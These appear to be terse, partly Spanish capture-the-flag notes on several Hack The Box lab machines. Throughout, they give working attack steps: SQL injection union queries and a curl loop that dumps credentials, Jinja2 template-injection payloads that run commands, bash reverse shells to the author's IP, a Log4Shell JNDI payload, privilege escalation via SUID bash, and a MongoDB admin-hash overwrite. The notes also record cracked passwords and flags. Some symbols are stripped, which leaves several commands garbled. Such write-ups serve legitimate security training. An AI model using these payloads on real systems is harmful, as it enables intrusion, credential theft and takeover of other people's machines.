# SSTI (Flask) = [HTTPS] https://passbolt.bolt.htb/ ; admin@bolt.htb requires an invitation. ; # Enumerar subdominios gobuster vhost -t 200 --url http://bolt.htb -w /home/vleon/Descargas/github/SecLists/Discovery/DNS/subdomains-top1million-5000.txt Found: demo.bolt.htb (Status: 302) [Size: 219] Found: mail.bolt.htb (Status: 200) [Size: 4943] *ADD TO etc/hosts http://demo.bolt.htb/login Codigo invitacion = buscar por la ref del input "invite_code"= grep -r -i "invite_code" --text [el la demo] = cd $(dirname 41093412e0da959c80875bb0db640c1302d5bcdffec759a3a5670950272789ad/layer.tar) tar -xf layer.tar ; cd app ; grep -r -i "invite_code" ; /routes.py = if code != 'XNSS-HSJW-3NGU-8XTJ': http://mail.bolt.htb/ test@bolt.htb ; test 7*7 campo settings Profile = 49 Interpreta y manda e-mail

PayloadAllTheThings = self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() = uid=33(www-data) gid=33(www-data) groups=33(www-data) = vi index.html (#!/bin/bash , bash -i /dev/tcp/10.10.15.54/443 01) ; python3 -m http.server 80 ; nc -nlvp 443 = hostname -I = 10.10.11.114

# Escalada [LinPEAS] linpeas.sh = python3 -m http.server 80 = which wget ; cd /tmp ; wget http://10.10.15.54/linpeas.sh ; chmod +x linpeas.sh ; ./linpeas.sh ;

#MySQL mysql -upassblot -p su eddie : rT2;jW7eY8dX8pQ8 cd ; ls ; cat user.txt = 812a2e0863a46d39cd5a4c1d8d6b8796 PGP PRIVATE KEY = to UNlock PGP Public key = merrychristmas gpg --import private.key ; gpg -d mesg.crypted = pass : merrychristmas = PASS ROOT = Z(2rmxsNW(Z?3=p/9s = su root ; cd /root/ ; flag= 071117d163659c16d4ae41c446d94479

#IPs ( GG: 10.10.11.130; ) #PING ping -c1 10.10.11.130 ttl=63 = LINUX ping -c1 10.10.11.130 -R echo $PATH

#NMAP (65535 puertos) Protocolo TCP nmap -p- --open -T5 -v -n 10.10.11.130 (con Enter veo la velocidad de scaneo) nmap -p- -sS --min-rate 5000 --open -vvv -n -Pn 10.10.11.130 -oG allPorts = Ports: 80/open/tcp//http/// nmap -sCV -p80 10.10.11.130 -oN targeted = PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.51 |_http-title: GoodGames | Community and Store |_http-server-header: Werkzeug/2.0.2 Python/3.9.2 Service Info: Host: goodgames.htb nmap --script http-enum -p80 10.10.11.130 -oN infoweb

# whatweb 10.10.11.130 http://10.10.11.130 [200 OK] Bootstrap, Country[RESERVED][ZZ], Frame, HTML5, HTTPServer[Werkzeug/2.0.2 Python/3.9.2], IP[10.10.11.130], JQuery, Meta-Author[_nK], PasswordField[password], Python[3.9.2], Script, Title[GoodGames | Community and Store], Werkzeug[2.0.2], X-UA-Compatible[IE=edge]

#Curl curl -s -X GET -I 10.10.11.130 [VER CABECERA WEB]

#Investigar en navegador Servidor web Flask # Inyection SQL test@test' or 1=1-- -

# Burpsuite (PROXY) burpsuite /dev/null [EJECUTAR APARTE] disown [DESVINCULAR PROCESO] Foxy Proxy = BurpSuite (Proxy/Repeater(req,res) = inyectar ' or 1=1-- - [Ver Content-Length: 9267]) Send inyection = email=test@test.com' or 1=1-- -password=test = [Content-Lenght : 9347] DONE! + Set-cookie: session= .eJw1yz0... + Login Successful + Welcome admin Intercepter "' or 1=1-- -" = Forward = Logedin (admin profile) = http://10.10.11.130/profile Config panel = http://internal-administration.goodgames.htb/ [VIRUAL HOSTING]= add to /etc/hosts ping -c1 goodgames.htb = Nombre o servicio desconocido ping -c1 internal-administration.goodgames.htb = Nombre o servicio desconocido = redirect http://internal-administration.goodgames.htb/login [NO CREDENTIALS]

# Enumerar bases de datos email=test%40test.com' order by 100-- -password=test = Content-Length: 33490 ' order by 4-- - = Content-Length: 9267 ¡DONE! ' union select 1,2,3,4-- - = Welcome 4 ' union select 1,2,3,"test"-- - = Welcome test [RESPONSE]

# Probar SSTI (server side template inyection) ' union select 1,2,3,"7*7"-- - = [NO INTERPRETA] ' union select 1,2,3,database()-- - = Base datos acutal = Welcome main ' union select 1,2,3,schema_name from information_schema.schemata-- - = Nombres DBs

# Enumerar base de datos "main" ' union select 1,2,3,table_name from information_schema.tables-- - = ADMIN_ROLE...... table_name from information_schema.tables limit 0,1-- - = Welcome ADMINISTRABLE_ROLE_AUTHORIZATIONS

# Organizar data de la base de datos curl -s -X POST http://10.10.11.130/login --data "email=test%40test.com' union select 1,2,3,table_name from information_schema.tables limit 0,1-- -password=test" # Filtrar campo Welcome | gerp "Welcome" | sed 's/^ *//'| awk 'NFprint $NF' | awk 'print $1' FS="" # Config sequenciador for i in $(seq 0 100);do echo "[+] Para $i:"consulta curl limit $i,1"; done = CONSULTA FINAL = for i in $(seq 0 100); do echo "[+] Para $i: $(curl -s -X POST http://10.10.11.130/login --data "email=test%40test.com' union select 1,2,3, table_name from information_schema.tables limit $i,1-- -password=test" | grep "Welcome" | sed 's/^ *//' | awk 'NFprint $NF' | awk 'print $1' FS="")"; done = ...information_schema.tables where table_schema=\"main\" limit... = Enumerar main

# user, blog, blog_comments (enumerar columnas) ...union select 1,2,3,column_name from information_schema.columns where table_schema=\"main\" and table_name=\"user\"... = id,email,password,name ...' union select 1,2,3,group_concat(name,0x3a,email,0x3a,password) from user limit ... = admin:admin@goodgames.htb:2b22337f218b2d82dfc3b6f77e7cb8ec y + usuarios

# Identificar hash passwd ¿? hash id 2b22337f218b2d82dfc3b6f77e7cb8ec hash-identifier ; 2b22337f218b2d82dfc3b6f77e7cb8ec = MD5 echo -n "2b22337f218b2d82dfc3b6f77e7cb8ec" | wc -c = 32 ch (YES) python -c 'import hashlib; print(hashlib.md5("azdfgzdfgbzdrfgdrfljyhgdyhm").hexdigest())' = 32

# Romper hash (tambien crackstation.) vi hash = 2b22337f218b2d82dfc3b6f77e7cb8ec = i ; :wq gzip -d rockyou.txt.gz = [+ descpomresores] john --wordlist=/usr/share/wordlists/rockyou.txt hash --format=Raw-MD5 = superadministrator (?)

# Panel admin = http://internal-administration.goodgames.htb/index BUSCAR SSTI (respuestas de interpretacion del servidor) 7*7 =http://internal-administration.goodgames.htb/settings = 49

# Biblia hacker (payloadsallthethings) = https://github.com/swisskyrepo/PayloadsAllTheThings Filtrar por SSTI = Jinja2 = RemoteCodeExecution self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() = uid=0(root) gid=0(root) groups=0(root) = 'id' = introducir comandos ej: hostname -I = 172.19.0.2 [contenedor]

# Validar trazas tcpdump -i tun0 icmp -n = escucha en mi interfaz tcp tun0 = 'id' = ping -c1 10.10.14.247 [YES x tcpdump = IP 10.10.11.130 10.10.14.247: ICMP echo request]

# Conect consola interactiva = crear index.html (vi index.html / #!/bin/bash/ bash -i /dev/tcp/10.10.14.247/443 01); = compartir con python = python3 -m http.server 80 = http://localhost/80 = cod consol = escucha puerto asignado = nc -nlvp 443 desde SSTI victima = ('curl 10.10.14.247') = #!/bin/bash bash -i ... veo el codigo y lo pipeo con | bash = interpreta bash y nos manda info por Netcat puerto indicado

# Tratamiento tty script /dev/null -c bash Ctrl+z stty raw -echo; fg reset xterm echo $TERM ; export TERM=xterm ; echo $SHELL = bash stty size ; stty rows 56 columns 238

# Contenedor victima [172.19.0.2] hostname -I ; whoami ; route -n [172.19.0.1 = GATEWAY]; ping -c 1 172.19.0.1 ; User flag : /home/augustus/user.txt = 4bfd53f2e2cf0ee85c39a875afb4f291 ls -l ; grep "augustus" /etc/passwd; grep "sh$" /etc/passwd ; cat /etc/group ; mount | grep home = /dev/sda1 on /home/augustus ; fdisk -l ; which fdisk ; df -h;

# Ver puertos abierto maquina GG desde el contenedor *Script bash*- cd /tmp ; echo '' /dev/tcp/172.19.0.1/80 = echo $? = Codigo de estado 0 [Y], 1 [N] (echo '' /dev/tcp/172.19.0.1/81) 2/dev/null = 1 *Seq*- for port in $(seq 1 65535); do done; wait (echo '' /dev/tcp/172.19.0.1/80) 2/dev/null echo "[+] Puerto abierto" || echo "[-] Puerto cerrado" Tiempo de vida cmd : timeout 1 bash -c = vi portScan.sh ; (VER CODIGO EN GG/content) = base64 -w 0 portScan.sh | xclip -sel clip = pegar en el contenedor = echo cadena | base64 -d portScan.sh chmod +x portScan.sh ; ./portScan.sh = Puerto 22 abierto [Nuevo puerto descubiero]

# Puerto SSH (22) [reutilizacion de credenciales] ssh augustus@172.19.0.1 password: superadministrator = augustus@GoodGames:~$ hostname -I = 10.10.11.130 Augustus flag : 4bfd53f2e2cf0ee85c39a875afb4f291

# Escalar privilegios K dispositivo? uname -a ; lsb_release -a Privilegos SUID = find \-perm -4000 2/dev/null Tareas cron = cat /etc/crontab Engrandeces PATh = echo $PATH ; export PATH=/root/... Ver capabilidades = which getcap ; getcap -r / 2/dev/null = solo ping cd /home/augustus ; cp /bin/bash . ; ls -l ; Volver al contenedor en el que esta montada la maquina = exit cd /home/augustus = desde el contenedor como ROOT = ls ; chown root:root bash asign SUID a bash = chmod 4755 bash vover a ssh augustus = ./bash -p ; whoami = root cd / ; cd root ; cat root.txt = FLAG ROOT = c682307c4267caea83431507bad0819c

# Reconocimiento ( NMAP = nmap -sC -sV -Pn -d 10.129.155.168 ) 21/tcp - FTP 22/tcp - SSH 80/tcp - HTTP

# Enumeracion directorios ( gobuster dir -w /usr/share/wordlists/dirb/common.txt -u 10.129.155.168 )

# FTP ( ftp 10.129.155.168 ; anonymous ; ls,get )

# Unzip ( unzip backup.zip ) zip2john backup.zip hash cat hash cp /usr/share/wordlists/rockyou.txt.gz rockyou.txt.gz gzip -d rockyou.txt.gz

john hash --fork=4 -w=rockyou.txt = 741852963 (backup.zip) # hashcat - md5sum o ( https://crackstation.net/ ) cat index.php = admin hash result: qwerty789

# Get request ( http://10.129.155.168/dashboard.php?search=a ) PHPSesionID - poqfu50r0d7hsnqleee6ecj59l ( inspect/storage ) sqlmap -u 'http://10.129.155.168/dashboard.php?search=a' --cookie="PHPSESSID=dok94i8oqj326aa4e8bqg8s4an" sqlmap -u 'http://10.129.155.168/dashboard.php?search=a' --cookie="PHPSESSID=chov3p3iln4rk6jcsb1tugubsn" --os-shell whoami = postgres

# Spam shell nc -lvnp 4444 os-shell bash -c 'bash -i /dev/tcp/10.10.15.251/4444 01' SHELL=/bin/bash script -q /dev/null

# Python shell python3 -c "import pty;pty.spawn('/bin/bash')" sudo -l

# Vi editor sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf :!/bin/bash

# Buscar database cd www/html cat dashboard.php dbname=carsdb user=postgres password=P@s5w0rd! # Admin flag dd6e058e814260bc70e9bbdef2715849 # User flag ec9b13ca4d6229cd5cc1e09980965bf7

# ping -c1 10.129.44.34 Linux = ttl=62

# nmap -sC -sV -Pn -n 10.129.150.98 Ports open = 22 ssh,6789 ibm-db2-admin?,8080 http-proxy, 8443 https [ssl/nagios-nsca]

# TLS = https://10.129.150.98:8443/manage/account/login?redirect=%2Fmanage

# Hostname = sudo nano etc/hosts = ip "alias"

# BurpSuite = Post/api/login "remember":"$jndi:ldap://10.10.14.153:389" sudo tcpdump -i tun0 port 389 sudo apt-get install maven git clone https://github.com/veracode-research/rogue-jndi cd rogue-jndi mvn package mvn -v

Apcahe Maven , Jndi, Wireshark echo 'bash -c bash -i /dev/tcp/Your IP Address/A port of your choice 01' | base64 java -jar target/RogueJndi-1.1.jar --command "bash -c echo,BASE64 STRING HERE| base64,-d|bash,-i" --hostname "YOUR TUN0 IP ADDRESS" $jndi:ldap://10.10.14.153:1389/o=tomcat nc -lvnp 4444

# Upgrade shell script /dev/null -c bash user flag : 6ced1a6a89e666c0620cdb10262ba127

ps aux | grep mongo mongo --port 27117 ace db.admin.find().forEach(printjson);

mkpasswd -m sha-512 Password1234 = $6$EthFWnL3mvUALirW$2S/gi4k2V4Vq80s1t4N/mqwFno3B3.8uZSoP8Uhwg4LetN3BaSEzsd4ljWAA0j1rip/ITcg9bAHjTH6i6DzMC0 mongo --port 27117 ace --eval 'db.admin.update("_id":ObjectId("61ce278f46e0fb0012d47ee4"),$set:"x_shadow":"$6$EthFWnL3mvUALirW$2S/gi4k2V4Vq80s1t4N/mqwFno3B3.8uZSoP8Uhwg4LetN3BaSEzsd4ljWAA0j1rip/ITcg9bAHjTH6i6DzMC0")' https://10.129.44.34:8443/manage/site/default/dashboard

ssh root@10.129.44.34 - password from setings / site _ NotACrackablePassword4U2022 root flag: e50bc93c75b634e4b272d2f771c33681